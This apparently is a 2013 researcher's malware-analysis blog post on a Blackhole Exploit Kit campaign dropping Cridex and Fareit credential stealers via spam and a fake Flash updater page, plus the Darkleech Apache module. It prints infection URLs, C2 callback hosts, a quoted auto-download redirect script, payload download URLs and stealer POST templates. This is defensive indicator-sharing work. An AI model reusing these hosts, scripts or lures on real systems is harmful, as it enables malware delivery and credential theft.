    InfoRelay  abuse@sitelutions.com
    4 Bridge Plaza Drive
    Englishtown
    NJ 07726 US
    Phone: (703) 485-4600 (voice)"
Record last updated on 2011-Oct-17.
Record expires on 2016-Nov-4.
Record created on 1998-Nov-4.
Record status: Active
Registrar of record: .NU Domain Ltd
Referral URL: http://www.nunames.nu
Domain servers in listed order:
    ns1.sitelutions.com
    ns2.sitelutions.com
    ns3.sitelutions.com
    ns4.sitelutions.com
    ns5.sitelutions.com
"Owner and Administrative Contact information for domains
registered in .nu is available upon request from support@nic.nu"
Copyright by .NU Domain Ltd - http://www.nunames.nu

*) This is my last post for this infection, FYI: we went far too long trying to keep things right..

Today we detected malware infection campaign created by the same bad actors we always follow. The below URL was setup for Password/Credential stealer (PWS) Trojan via spam email as per reported in fellow researcher's Mr. Conrad Longmore in "Dynamoo Blog" posts→[here] and [here]:

h00p://forumla.ru:8080/forum/links/column.php
h00p://forumny.ru:8080/forum/links/column.php
h00p://forum-ny.ru:8080/forum/links/column.php
h00p://forum-la.ru:8080/forum/links/column.php
h00p://foruminanki.ru:8080/forum/links/column.php
h00p://forumilllionois.ru:8080/forum/links/column.php
h00p://210.71.250.131:8080/forum/links/column.php
h00p://198.104.62.49:8080/forum/links/column.php

These URL lead us to the two IP addresses serving Blackhole Exploit Kit below:

198.104.62.49
210.71.250.131

Which both IP are serving the same malware (see the snapshot below):

We are not going to include the Blackhole Exploit Analysis nor decoding here, and will focus on the analysis of the recent version credential stealer used. With noted: Our previous released guide→[here] to decode BHEK can be applied to decode all of the exploit components.

The CyberCriminal group itself is utilizing Russian-based .RU registrar called NAUNET(.RU), which nowadays quite famous for its reputation in "keep-on-allowing" registration of malicious domains in east Europe basis to aim worldwide servers as infectors and preying on American & European online banking information. The details of previous malicious domains used by this criminal group served by NAUNET can be seen in our previous post→[here].

Same samples in both IPs..

This is my log while fetching the first and second samples:
GET /forum/links/column.php?sf=2w:1l:1l:2v:1f&he=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&ru=w&cz=p HTTP/1.0
Host: 198.104.62.49:8080
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 05 Mar 2013 08:21:29 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 05 Mar 2013 08:21:30 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary
Content-Length: 110592
200 OK
Length: 110592 (108K) [application/x-msdownload]
Saving to: `about1.exe'
2013-03-05 17:21:54 (47.6 KB/s) - `about1.exe' saved [110592/110592]
and 
GET /forum/links/column.php?of=1o:1h:32:1l:1j&me=2v:1k:1m:32:33:1k:1k:31:1j:1o&n=1k&qo=q&yy=b HTTP/1.0
Host: 210.71.250.131:8080
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 05 Mar 2013 08:32:02 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 05 Mar 2013 08:32:20 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary
Content-Length: 110592
200 OK
Length: 110592 (108K) [application/x-msdownload]
Saving to: `about2.exe'
2013-03-05 17:32:43 (109 KB/s) - `about2.exe' saved [110592/110592]
Compare result of the binaries: 
2013/03/05  17:21  110,592 about1.exe 612b6e43fd5e5933ea072d5df501790a
2013/03/05  17:32  110,592 about2.exe 612b6e43fd5e5933ea072d5df501790a
The samples looks like this..
Picture snapshot: Which is having the below binary information: 
Entry Point at 0x15d1
Virtual Address is 0x4015d1
Compile Time: 0x42973D89 [Fri May 27 15:32:25 2005 UTC] / 2005-05-28 00:32:25
CRC checks: Looks fine!

Sections:
   .text 0x1000 0x15c14 90112
   .data 0x17000 0x100370 4096
   .rsrc 0x118000 0x2408 12288

Hex first block snips..
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   31 90 0E 35 75 F1 60 66 75 F1 60 66 75 F1 60 66    1..5u.`fu.`fu.`f
0090   52 37 0D 66 76 F1 60 66 52 37 1D 66 67 F1 60 66    R7.fv.`fR7.fg.`f
00A0   52 37 11 66 8B F1 60 66 52 37 1C 66 74 F1 60 66    R7.f..`fR7.ft.`f
00B0   52 37 18 66 74 F1 60 66 52 69 63 68 75 F1 60 66    R7.ft.`fRichu.`f
00C0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00E0   50 45 00 00 4C 01 03 00 89 3D 97 42 00 00 00 00    PE..L....=.B....
As per picture showed, it tried to fake Microsoft application: 
LegalCopyright: \xa9 Microsoft Corporation. All rights reserved.
InternalName: rigpsnap.dll
FileVersion: 6.0.6000.16386 (vista_rtm.061101-2205)
CompanyName: Microsoft Corporation
ProductName: Microsoft\xae Windows\xae Operating System
ProductVersion: 6.0.6000.16386
FileDescription: Remote Installation Service Policy Snap-in
OriginalFilename: rigpsnap.dll
Infection Summary
Malware runs CMD to move original location & delete initial trace: While the Cridex trojan is saved to %AppData%\KB********.exe Cridex will be run by injected in memory then dropped a  Trojan Fareit stealer in %Temp%\exp2.tmp.exe: During Cridex runs it will download configuration data  to be saved in registry key as binary: We must view it in ASCII to see what it is.. as per below snapshot.. To be loaded & processedin memory as per snapshot (Cridex parts) For Trojan Fareit part, this variant is NOT using the config: But using the original stealer scheme planted in its binary..

The autorun in registry was set in the usual place:

HKU\..\Software\Microsoft\Windows\CurrentVersion\Run\KB00777165.exe: 
""C:\Documents and Settings\rik\Application Data\KB00777165.exe""

Which IP are they use as callbacks this time?

h00p://209.17.186.246:8080
h00p://203.171.234.53:8080
h00p://64.85.53.168:8080
h00p://161.246.35.117:8080
h00p://202.29.5.195:8080
h00p://213.214.74.5:8080
h00p://174.121.67.199:8080
h00p://174.143.234.138:8080
h00p://18.79.3.253:8080
h00p://141.219.153.206:8080
h00p://72.251.206.90:8080
h00p://149.156.96.9:8080
h00p://212.68.63.82:8080
h00p://88.119.156.20:8080
h00p://91.199.155.222:8080
h00p://194.249.217.8:8080
h00p://109.168.106.162:8080
h00p://85.214.143.90:8080
h00p://195.191.22.97:8080
h00p://188.138.96.241:8080
h00p://31.3.103.101:8080
h00p://213.251.164.83:8080
h00p://82.100.228.130:8080
h00p://194.97.99.120:8080
h00p://78.47.153.131:8080

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: x.x.x.x:8080
Content-Length: %n
Connection: Keep-Alive
Cache-Control: no-cache

Fareit used callbacks to below hosts/URL (HTTP/1.0)

h00p://203.114.112.156:8080/asp/intro.php
h00p://42.121.116.38:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://85.25.147.73:8080/asp/intro.php
h00p://208.87.243.130:8080/asp/intro.php
h00p://202.164.211.51:8080/asp/intro.php
h00p://111.68.142.223:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://195.24.205.188:8080/asp/intro.php

POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}

var adminPanelLocation = 'h00p://37.139.47.124/_CRE_/';
[CDATA[h00p://37.139.47.124/_CP_/cp_a.php?h=8
h00p://37.139.47.124/_CRE_/gate.php?done=1&bid=%USER%-1379CF37C25_9455E50D0B2D20CB&info=[random]
h00p://37.139.47.124/_CRE_/gate.php?bid=%USER%-1379CF37C25_9455E50D0B2D20CB&location=[random]

Hey hold on, what's the evidence?

(Click the number to download the materials below)
For the callbacks I recorded below set of PCAPs:
[1] First infection 
[2] Re-producing the first session infection (different env)
[3] Trojan Win32/Cridex traffic captured over interval
[4] Trojan Win32/Fareit traffic captured over interval

For the registry record:
[1] First infection
[2] Re-producing the first infection first session (different env)

For the process runtime record:
[1] Trojan Win32/Cridex Full Process Trace
[2] Trojan Win32/Fareit Full Process Trace

Stolen Credential Information:
Here's the config file with the beautified format -->>[HERE]
The Trojan Win32/Fareit grabbed credential list -->>[HERE]

In Virus Total

I really took time in analysing & writing this report, yet there are so 
many details I cannot expose for the security purpose. 
I hope VT has the good detection now:

Trojan Win32/Cridex - VT URL -->>[HERE]
SHA1: 531923a72560d723ed764bf3618633dc541b56f9
MD5: 612b6e43fd5e5933ea072d5df501790a
File size: 108.0 KB ( 110592 bytes )
File name: rigpsnap.dll
File type: Win32 EXE
Tags: peexe
Detection ratio: 17 / 46
Analysis date: 2013-03-05 13:58:09 UTC ( 3 minutes ago )
File ./about.exe with MD5 612b6e43fd5e5933ea072d5df501790a
----------------------------------------------------------
DrWeb                    : Trojan.Necurs.97
VIPRE                    : Win32.Malware!Drop
Symantec                 : WS.Reputation.1
TrendMicro               : WORM_CRIDEX.UWA
ESET-NOD32               : a variant of Win32/Kryptik.AVXR
Fortinet                 : W32/Kryptik.ALRY!tr
TrendMicro-HouseCall     : WORM_CRIDEX.UWA
Sophos                   : Mal/Generic-S
Ikarus                   : Trojan.Win32.Bublik
Kaspersky                : Trojan.Win32.Bublik.ahqz
PCTools                  : Suspicious.Cloud.7.L
Malwarebytes             : Trojan.FakeMS
Panda                    : Trj/dtcontx.C
Kingsoft                 : Win32.Troj.Bublik.ah.(kcloud)
AntiVir                  : TR/Bublik.ahqz
Emsisoft                 : Trojan.Win32.Bublik.ahqz.AMN (A)
Comodo                   : TrojWare.Win32.Trojan.Agent.Gen
Trojan Stealer Win32/Fareit - VT URL -->>[HERE]
SHA1: f994fbf2663ef2b9b0347f42e057bd03ed0dcefe
MD5: a25bb86368cf2e62de4f8f25b8e0824a
File size: 104.0 KB ( 106496 bytes )
File name: rigpsnap.dll
File type: Win32 EXE
Tags: peexe
Detection ratio: 7 / 46
Analysis date: 2013-03-05 13:58:42 UTC ( 4 minutes ago )
File ./exp2.tmp.exe with MD5 a25bb86368cf2e62de4f8f25b8e0824a
-------------------------------------------------------------
Symantec                 : WS.Reputation.1
ESET-NOD32               : a variant of Win32/Kryptik.AVXR
TrendMicro-HouseCall     : TROJ_GEN.F47V0305
Kaspersky                : Trojan-PSW.Win32.Tepfer.groi
PCTools                  : Suspicious.Cloud.7.L
Malwarebytes             : Trojan.FakeMS
Fortinet                 : W32/Kryptik.ALRY!tr
Samples
For the research & raising detection ratio purpose we are sharing the analyzed samples: Download here -->>[HERE]
Additional Section
*) This section is to be added with additional information periodically. The below new detection also noted: ・This cridex variant was detecting whether the infected PC is 64bit or not.. ・Many new additionals cookies & etc function in the config file.. ・For the NAUNET Registrar relation PoC to these domains is here -->>[HERE]・Until now, we analyzed 25 times for this cybercrime group, 1 dir = 1 analysis↓   

This story is all started from an EK landing page at:
"h00p://17.247nycr.com/news/breaks-harmless.php"
in the IP: 173.246.102.2At the below network registration: 
NetRange:       173.246.96.0 - 173.246.111.255
CIDR:           173.246.96.0/20
OriginAS:       AS29169
NetName:        GANDI-NET-DC1-1
NetHandle:      NET-173-246-96-0-1
Parent:         NET-173-0-0-0-0
NetType:        Direct Allocation
Comment:        http://www.gandi.net/
RegDate:        2010-06-18
Updated:        2012-02-24
Ref:            http://whois.arin.net/rest/net/NET-173-246-96-0-1
OrgName:        Gandi US Inc.
OrgId:          GANDI-2
Address:        Gandi US Inc.
Address:        PO Box 32863
City:           Baltimore
StateProv:      MD
PostalCode:     21282
Country:        US
RegDate:        2010-05-20
Updated:        2010-06-24
Comment:        Gandi is an ICANN accredited registrar and VPS/Cloud hosting provider with operations in France, UK, and the United States.
Comment:        http://www.gandi.net/
Ref:            http://whois.arin.net/rest/org/GANDI-2
Which I checked it further to find a Blackhole Eexploit Kit: 
Server: nginx/0.7.67
Date: Thu, 07 Mar 2013 11:19:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14-1~dotdeb.0
As a reference infector(URL)-->>[urlquery.net]And a long list of historical reports of same IP-->>[urlquery.net]

"h00p://17.247nycr.com/news/breaks-harmless.php?df=1m:1o:1g:1g:31&xe=1n:1m:1o:1g:1o:33:33:1k:31:1o&y=1f&fl=c&eh=q&jopa=6435338"

..And the downloaded payload is as per show in URLQuery snapshot here-->http://urlquery.net/report.php?id=1268751

I received a separate report by "a friend" about an active end of TDS and another separated report of Spam destination pointed to the same infector server BUT with the different domain name as per below URL:

"h00p://17.optimax-fuel-saver.us/adobe/"

The Fake Adobe download page looks like below (looks lame isn't it?):
A view via Internet Explorer: A view via Mozilla Firefox:(sorry for the japanese browsers I used..)

which is having a redirect script is as per below:

// Evil script in Line 139:
  :
＜script language = 'javascript'＞
  var delay = 3000;
  setTimeout("document.location.href='update_flash_player.exe'", delay);
＜/script＞

--2013-03-07 15:58:47--  
"h00p://17.optimax-fuel-saver.us/adobe/update_flash_player.exe"
Resolving 17.optimax-fuel-saver.us... seconds 0.00, "173.246.102.2"
Caching 17.optimax-fuel-saver.us => "173.246.102.2"
Connecting to 17."optimax-fuel-saver.us"|"173.246.102.2|:80"... seconds 0.00, connected.
"GET /adobe/update_flash_player.exe HTTP/1.0
Referer: h00p://17.247nycr.com/news/breaks-harmless.php
Host: 17.optimax-fuel-saver.us"
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 07 Mar 2013 06:57:52 GMT
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 136704
Last-Modified: Thu, 07 Mar 2013 06:55:01 GMT
Accept-Ranges: bytes
200 OK
Registered socket 1896 for persistent reuse.
Length: 136704 (134K) [application/octet-stream]
Saving to: `update_flash_player.exe'
2013-03-07 15:58:52 (44.6 KB/s) - `update_flash_player.exe' saved [136704/136704]

"What is with this payload? Why the double-routes infection scheme is so necessary?"These questions will be answered by studying the payloads as follows:

Payload: Fake Adobe Flash Updater

The bad guys are utilizing Adobe Flash Updates season to release this fake updater together with the lame Adobe home page. The payload binary looks like below:

// File Information:
Sections:
   .text 0x1000 0x13b0 5120
   .rdata 0x3000 0xc0c 3584
   .data 0x4000 0xa0a 3072
   .rsrc 0x5000 0x1e2ac 123904

File Size : 136 KB
Entry Point: 0x1174
Compile Time: "2013-01-24 03:07:22
              0x510026DA [Wed Jan 23 18:07:22 2013 UTC]"
CRC Fail. Claimed:  0, Actual:  201663

//Anti-reverse:
0x401174 mov eax esi 
0x401176 add esi 0x403110 
0x401178 sub esi 0x6d 
0x40117e mov esi [si-0x1] 
0x401181 push 0x55 
0x401184 shl esi 0xc 
0x401186 pop ecx 
0x401189 shl esi 0x4 
0x40118a add eax esi 
0x40118d add eax 0x8f 
0x40118f mov edx [eax+ecx2+0x2] 
0x401192 shr edx 0x8 
0x401196 add esi edx 
0x401199 mov ecx [si+0x1d] 
0x40119b sub cl 0x0 
0x40119e jz 0x4011c6L 
0x4011a1 mov dl 0x1c 
0x4011a3 cmp cl dl 
0x4011a5 jb 0x4011bdL 
0x4011a7 mov dl 0xc0 
0x4011a9 cmp cl dl 
0x4011ab nop "
0x4011ad ja 0x4011bdL 
0x4011ae mov r15d 0x404000 
0x4011b0 xor eax eax 
0x4011b5 jz 0x4010d0L 
0x4011b7 xor eax eax 
0x4011bd mov [fs:ax] esp "
0x4011bf nop 
0x4011c2 pushad 
0x4011c3 jmp near 0x4011bdL 
0x4011c4 xor eax eax 
0x4011bd mov [fs:ax] esp 
0x4011bf nop 
   :      : //loops..
↑the binary itself is encoded with a packer - with utilize using anti-reverse loops to avoid us getting the - imports data. Suggesting this wasn't a work of automation.  Packer information: 
"aPLib v1.01"  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
More information: "http://www.ibsensoftware.com/"
hex of the 1st block: 
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 FF 00 00 00 7C 00 00 00    ............|...
0040   BC 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90    ........!..L.!..
0050   54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73    This program mus
0060   74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57    t be run under W
0070   69 6E 33 32 0D 0A 24 37 00 00 00 00 50 45 00 00    in32..$7....PE..
0080   4C 01 04 00 DA 26 00 51 00 00 00 00 00 00 00 00    L....&.Q........
0090   E0 00 0F 01 0B 01 0C 00 00 14 00 00 00 FE 01 00    ................
00A0   00 00 00 00 74 11 00 00 00 10 00 00 00 30 00 00    ....t........0..
00B0   00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00    ..@.............
00C0   00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00    .............@..
00D0   00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00    .................
 :                            :                                :
The picture of binary is like this: ↑Well, it looks convincing... ..except..if you run it you'll see the "different" works as per below: The below are the overall summary of this infection: 1. The malware runs connect to these remote hosts: 
"h00p://64.13.172.42:8080/forum/viewtopic.php
h00p://20.anythinginternational.biz/forum/viewtopic.php
h00p://20.anythinginternational.com/forum/viewtopic.php
h00p://20.chelsiamd.com/forum/viewtopic.php
"
2. Which sending the HTTP/1.1 POST i.e.: 3. And then send request to download OTHER malware to: 
"h00p://kfz-youngtimerservice.de/P81.exe
h00p://mtmedia.net/tJr4H.exe
h00p://cinemacityhu.iq.pl/iN5Vf.exe
"
PoC: 4. The downloaded file was saved in %Temp%: 5. With little help of evil BAT file the payload was saved in %AppData% as random DLL: 6. The %AppData% saved DLL was executed via RUNDLL32.EXE,     after running and it made changes in the registry: 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\uping: 
  "rundll32.exe "C:\Documents and Settings\rik\Application Data\uping.dll",AAuxClose"
7. And executed iexplorer.exe with the "-Embedding" option  8. Then via iexplore.exe it started next series of malware download from megaupload.com: 9. And also some malform UDP/137 request sent:  What is the purpose of the POST request? Yes friends, is to steal credentials. The below information are aimed to be stolen by ths malware: 
My Documents
AppData
Local AppData
Cache
Cookies
History
My Documents
Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
   :
PLUS MORE credentials of this software list -->>[PASTEBIN]
How bad are these malicious stuffs?

What's the purpose of this IP's infection then?

The purpose is to grab as much's victim's credentials by using front end infection of Fake Software Updater. Just like the pages with url we saw, there are so many other Fake Updaters is served under other IPs too, and they are all using typical bogus url of http://[2digitnumber].[fakebrowser-bogus-strings].com/[adobe|chrome|other updater possibilities]/ which is suggested the same cryber crime group action, for example as per found in IP: 173.255.215.242 by our friend @hugbomb here:

Fake Adobe Flash Player Updates for Chrome:

Fake Google Chrome Update

The currently active domains pointed to IP used by this Criminal Group: 173.255.215.242 and 173.246.102.2 are strongly suggested to be blocked, i.e. below list:

17.247nycr.com
17.ir-c.net
17.optimax-fuel-saver.us
17.schnoescpa.com
17.setapartcreative.com
. :

// lookup optimax-fuel-saver.us
17.optimax-fuel-saver.us internet address = 173.246.102.2
optimax-fuel-saver.us   nameserver = "ns07.domaincontrol.com"
optimax-fuel-saver.us   nameserver = "ns08.domaincontrol.com"
optimax-fuel-saver.us
        primary name server = ns07.domaincontrol.com
        responsible mail addr = dns.jomax.net
        serial  = 2013030500
        refresh = 28800 (8 hours)
        retry   = 7200 (2 hours)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)
//whois
Domain Name:                                 OPTIMAX-FUEL-SAVER.US
Domain ID:                                   D36373111-US
Sponsoring Registrar:                        "GODADDY.COM, INC."
Sponsoring Registrar IANA ID:                146
Registrant ID:                               CR115585728
Created by Registrar:                        GODADDY.COM, INC.
Last Updated by Registrar:                   GODADDY.COM, INC.
Domain Registration Date:                    Sun Jun 10 01:03:54 GMT 2012
Domain Expiration Date:                      Sun Jun 09 23:59:59 GMT 2013
Domain Last Updated Date:                    Sun Jun 10 01:03:55 GMT 2012

// lookup phccpro.com
20.phccpro.com  internet address = 173.255.215.242
phccpro.com     nameserver = "ns37.domaincontrol.com"
phccpro.com     nameserver = "ns38.domaincontrol.com"
        primary name server = "ns37.domaincontrol.com"
        responsible mail addr = dns.jomax.net
        serial  = 2013030600
        refresh = 28800 (8 hours)
        retry   = 7200 (2 hours)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)

//whois it?
  Domain Name: PHCCPRO.COM
   Registrar: "GODADDY.COM, LLC"
   Whois Server: whois.godaddy.com
   Referral URL: http://registrar.godaddy.com
   Name Server: NS37.DOMAINCONTROL.COM
   Name Server: NS38.DOMAINCONTROL.COM
   Status: clientDeleteProhibited
   Status: clientRenewProhibited
   Status: clientTransferProhibited
   Status: clientUpdateProhibited
   Updated Date: 15-apr-2011
   Creation Date: 20-jun-2009
   Expiration Date: 20-jun-2013<

//lookup 17.setapartcreative.com
17.setapartcreative.com internet address = 173.246.102.2
setapartcreative.com    nameserver = ns07.domaincontrol.com
setapartcreative.com    nameserver = ns08.domaincontrol.com
setapartcreative.com
        primary name server = ns07.domaincontrol.com
        responsible mail addr = dns.jomax.net
        serial  = 2013030400
        refresh = 28800 (8 hours)
        retry   = 7200 (2 hours)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)
//whois:
   Domain Name: SETAPARTCREATIVE.COM
   Registrar: "GODADDY.COM, LLC"
   Whois Server: whois.godaddy.com
   Referral URL: http://registrar.godaddy.com
   Name Server: "NS07.DOMAINCONTROL.COM"
   Name Server: "NS08.DOMAINCONTROL.COM"
   Status: clientDeleteProhibited
   Status: clientRenewProhibited
   Status: clientTransferProhibited
   Status: clientUpdateProhibited
   Updated Date: 04-feb-2013
   Creation Date: 03-feb-2009
   Expiration Date: 03-feb-2014

Samples

Virus Total Detection of Trojan/Fareit-->>[URL], summary:
SHA1: 1e9769c652e94af4b0accc42da643a1c00021b30
MD5: a1545b09716f6036739daafa003649a1
File size: 133.5 KB ( 136704 bytes )
File name: update_flash_player.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 17 / 46
Analysis date: 2013-03-07 12:07:28 UTC ( 2 hours, 8 minutes ago )

F-Secure                 : Trojan.FakeAlert.DFX
F-Prot                   : W32/SuspPack.EX2.gen!Eldorado
Symantec                 : Suspicious.Cloud
ESET-NOD32               : a variant of Win32/Kryptik.AWDG
MicroWorld-eScan         : Trojan.FakeAlert.DFX
Avast                    : Win32:LockScreen-SL [Trj]
nProtect                 : Trojan.FakeAlert.DFX
CAT-QuickHeal            : (Suspicious) - DNAScan
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Trojan.FakeAlert.DFX
McAfee                   : BackDoor-FJW
Malwarebytes             : Malware.Packer.SGX2
Fortinet                 : W32/Kryptik.KZ!tr
GData                    : Trojan.FakeAlert.DFX
PCTools                  : HeurEngine.ZeroDayThreat
Sophos                   : Troj/Zbot-ECS
Comodo                   : Heur.Packed.Unknown
Virus Total Detection of Trojan Medfos-->>[URL], summary: 
SHA1: fbc141e3c155b809298f53336c583697a209e567
MD5: 68db8dfe21ffa72982402fef5ef48c14
File size: 145.0 KB ( 148480 bytes )
File name: int.EXE
File type: Win32 EXE
Tags: peexe
Detection ratio: 13 / 46
Analysis date: 2013-03-07 10:41:05 UTC ( 3 hours, 37 minutes ago )

F-Secure                 : Gen:Variant.Zusy.38855
GData                    : Gen:Variant.Zusy.38855
Norman                   : Medfos.BO
ESET-NOD32               : a variant of Win32/Medfos.LL
MicroWorld-eScan         : Gen:Variant.Zusy.38855
Sophos                   : Mal/Medfos-M
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Gen:Variant.Zusy.38855
Malwarebytes             : Trojan.Medfos
Panda                    : Suspicious file
Fortinet                 : W32/Medfos.KG!tr
PCTools                  : HeurEngine.ZeroDayThreat
Microsoft                : Trojan:Win32/Medfos.A  
And the samples download for research purpose.. ..is here--->>[MEDIAFIRE]And these are PCAP data I recorded-->>[HERE]*) Please feel free to contact us by twitter for more research materials :-)  

Malware Definition and Historical Research

This definition is written by the latest observation of the large infection case occurred caused by this malware's infection on Linux Apache Web Servers.

Darkleech Apache Malware Module version (there is also detected an NGNIX version of this malware as per mentioned -->here by Eric Romang) is the malware implemented in Linux OS served with Apache web server with the Apache API interactive module. Malware module was loaded and activated into the Apache web server system by LoadModule command defined in the module configuration file. Once it is loaded into the system it perform general malicious functionality of: [1] Self injection of compromised server's web pages with the code to redirect victim to the malware sites and [2] Backdoor the compromised server system from the remote access.

Before starting the details of infection it is good to understand the background of malware to be about to discussed in this post:

This malware is already recognized by antivirus products with the reference name of Linux/Chapro.x or other names, you can seek it in Google-->here. Historically, this malware's infection attack was firstly exposed by Unmask Parasites on August 13th, 2012 in--> here and was firstly very detailed disclosed in October 2012 by russian malware researcher in PDF presentation shared at yandex.ru-->here. (Direct download PDF is-->here). And I believe the first english coverage of this malware was written by Unmask Parasites in--> here. Following by various anti virus research reports and coverage i.e. by ESET, Securelist, Symantec, etc.

The first malware infection collaboration with Exploit Kit to infect various malware to the client PC was exposed firstly by Malware Don't Drink Coffee blog in--> here (EK: Sweet Orange, Malware: Zbot), and the latest infection detected using this malware was pointing to Blackhole Exploit Kit with spreading combination of Trojan PWS/Downloader collaborated with FakeAV and/or ZeroAccess malware, exposed in--> here.

The first time the related malware sample was uploaded to Virus Total is in--> here. And the link between Darkleech underground forum to this malware firstly exposed via Eric Romang's post in--> here, which pointing to the Russian underground forum (forum snapshot is below).

Latest Infection Details

The malware was found in web server systems with below characteristic:
Linux RedHat-base distribution without SE Linux properly set
Apache httpd web server 2.x (rpm-base, as per it is)
Cgi-base web admin panel and/or Wordpress system's served
Malware module file was found with the below regex: 
mod\_[a-z0-9]{3,}\_[a-z0-9]{3,}\.so
With the below file names: 
mod_sec2_config.so
mod_pool_log.so
mod_chart_proxy.so
mod_balance_alias.so
  :
Malware was loaded in various malicious conf file with using Apache module's LoadModule method below: 
$ cat ../etc/../modules/[VARIOUS].conf| grep "mod_"
LoadModule sec2_config_module modules/mod_sec2_config.so
PS:  malware module files was using old dates.

Infection Symptoms

When an Apache web server get infected by this malware it shows the unwanted redirection to the remote web servers served with the malware infection codes, mostly are Exploit Kit's landing page. One real infection session is shown as below PCAP record:

Landing page like:

Before redirection occurred the malware injection code will 
be detected in the previous HTTP GET traffic in the 
infected server as per below PCAP (see the 1st request)

In the first traffic we'll see the malware injected code:

contains the javascript wrapped iframe code like below:

which will trigger the malware downloads like real sample below:


Infection Condition

1. The usage of referer to block unwanted browsers.
By reversing, we found the malware has function 
(C_ARRAY_BAN_USERAGENT) to ban unwanted browsers 
with the below list:
SAFARI             YANDEX
OPERA              CRAWLER
FIREFOX            JIKE
CHROME             SPIDER
GOOGLEBOT          ROBOT
SLURP              PAPERLIBOT
YAHOO              SNAPPREVIEWBOT
BING               BUFFERBOT
LINUX              MEDIAPARTNERS
OPENBSD            HATENA
MACINTOSH          BLUEDRAGON
MAC OS             WORDPRESS
IPHONE             XIANGUO
SYMBIANOS          WOOPINGBOT
NOKIA              CAFFEINATED
LINKDEX            FEEDZIRRA
FROG/1             BITLYBOT
USER-AGENT         FOIIABOT
BLACKBERRY         PROXIMIC
MOTOROLA           VBSEO
APPLE-PUB          FOLLOWSITE
AKREGATOR          SOGOU
SONYERICSSON       NHN
MACBOOK            WGET
XENU LINK          MSNBOT
METAURI            YOUDAO
REEDER             STACKRAMBLER
MOODLEBOT          LWP::SIMPLE
SAMSUNG            QIHOOBOT
SINDICE-FETCHER    BRUTUS
EZOOMS             HTTPCLIENT
NIKOBOT            NIELSEN
BINLAR             CURL
DARWIN             PHP
PLAYSTATION        INDY LIBRARY
OPERA MINI         NINTENDO
2. Checked referer sitesDetected malware modules was checking below sites before injecting the redirection code, spotted in value of C_ARRAY_SE_REFERRER below: 
GOOGLE.     ICQ.   
YAHOO.      NETZERO.  
YANDEX.     FRESH-WEATHER.   
RAMBLER.    FREECAUSE.    
MAIL.RU     MYSEARCH-FINDER.   
BING.       NEXPLORE. 
SEARCH.     ATT.   
MSN.        REDROVIN.
ALLTHEWEB.  TOSEEKA.      
ASK.        COMCAST.
LOOKSMART.  INCREDIMAIL.      
ALTAVISTA.  CHARTER.      
WEB.DE      VERIZON.  
FIREBALL.   SUCHE.     
LYCOS.      VIRGILIO.  
AOL.        VERDEN.
After some tests on the infected sites we found that the referer below was not infecting the sites.  3. Others malware blacklist method:

C_ARRAY_BAN_LOCAL_IP
